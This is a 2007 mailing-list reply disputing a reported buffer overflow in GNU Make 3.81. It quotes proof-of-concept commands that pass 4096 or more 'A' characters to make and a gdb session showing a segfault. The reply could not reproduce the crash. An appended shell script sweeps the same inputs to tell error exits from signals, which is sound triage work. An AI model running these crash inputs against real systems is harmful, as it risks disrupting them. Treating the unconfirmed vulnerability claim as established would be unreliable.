On 06 December 2007 05:09, laurent gaffie wrote:

> Application: Make <= 3.81
> Web Site: http://savannah.gnu.org/projects/make/ &
> http://www.gnu.org/software/make/
> Platform: Unix
> Bug: multiple buffer overflow
> Proof of concept example :
> make `perl -e 'print"A"x4096'` //***
> make -f `perl -e 'print"A"x4096'`
> make -j `perl -e 'print"A"x4096'`
> make -i `perl -e 'print"A"x4096'`
> make -l `perl -e 'print"A"x4096'`
>
> *** depending the case , you'll need to change the value , for a couple
> of more A , playing by hundred should be good to make sure you trigger it

I couldn't reproduce any of these, on either Linux or Cygwin, on 3.80 or 3.81
(although I didn't try absolutely every possible combination there). I get lots
of "stat: AAAAAA[...]AAAA: File name too long" and "No rule to make target
`AAAAA[..]AAAA'" messages instead.

> [EMAIL PROTECTED]:~# gdb make
> GNU gdb 6.6-debian
> Copyright (C) 2006 Free Software Foundation, Inc.

Is it possible that Debian's distro has a customised version of make? Did you
build make from CVS sources or tarballs? I see you've got no stack backtrace in
your debug output; if you did build your own, you'd get symbol info.

> (gdb) run `perl -e 'print"A"x4296'`//my GCC version have a protection for
> stack smashing then 200 chars more , and we trigger it

Hmm, perhaps the stack smashing protection is generating a false positive? I
guess this implies that you /are/ building make from sources, yes?

> Starting program: /usr/bin/make `perl -e 'print"A"x4296'`
> (no debugging symbols found)
> (no debugging symbols found)
> (no debugging symbols found)
> (no debugging symbols found)
> (no debugging symbols found)
> [Thread debugging using libthread_db enabled]
> [New Thread -1209637200 (LWP 1246)]
> make: stat: AAAAAAAAAAAAAAAAAAAAAAAA....AAAAAAA
> AAAAA.........AAAAAAAAAA....

That's the kind of message I see from make...

> Program received signal SIGSEGV, Segmentation fault.

... but I don't get a SEGV. Can you try it again without stack protection?

cheers,
DaveK
-- 
Can't think of a witty .sigline today....
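The two sides of this thread disagree on one observable: whether make exits with its own error or is killed by a signal. The script below is an added example (not part of the thread or of GNU make) that records that per build by running each reported invocation in an empty directory and classifying the exit status. The names `classify_status`, `probe`, `sweep` and `MAKE_BIN` are assumptions, and the 4596 upper bound is a constructed choice following the report's "playing by hundred".

```shell
#!/bin/sh
# Added triage helper: tells a make error exit apart from death by signal.

# Map a shell exit status to a verdict: 0 = ok, >128 = killed by signal N.
classify_status() {
    if [ "$1" -eq 0 ]; then echo "ok"
    elif [ "$1" -gt 128 ]; then echo "signal:$(($1 - 128))"
    else echo "error:$1"
    fi
}

# probe BIN LEN [OPT]: run BIN [OPT] <LEN x 'A'> in an empty temp directory
# so no local Makefile is picked up, and print the verdict.
probe() (
    bin=$(command -v "$1") || { echo "missing"; exit 0; }
    arg=$(head -c "$2" /dev/zero | tr '\0' 'A')
    tmp=$(mktemp -d) || exit 1
    status=0
    (cd "$tmp" && "$bin" ${3:+"$3"} "$arg") >/dev/null 2>&1 || status=$?
    rm -rf "$tmp"
    classify_status "$status"
)

# sweep BIN: the five invocations from the report, lengths 4096..4596 by 100.
sweep() {
    for opt in "" -f -j -i -l; do
        len=4096
        while [ "$len" -le 4596 ]; do
            echo "make ${opt:-<target>} len=$len: $(probe "$1" "$len" "$opt")"
            len=$((len + 100))
        done
    done
}

# Only runs when the caller names the build to test, e.g.
#   MAKE_BIN=/usr/bin/make sh triage.sh
if [ -n "${MAKE_BIN:-}" ]; then
    sweep "$MAKE_BIN"
fi
```

A verdict of `error:2` is make's own failure exit, matching the "File name too long" behaviour described in the reply; `signal:11` is a SIGSEGV as in the quoted gdb session. Comparing the distro package against a build from the upstream tarball, with and without stack protection, answers the questions the reply raises.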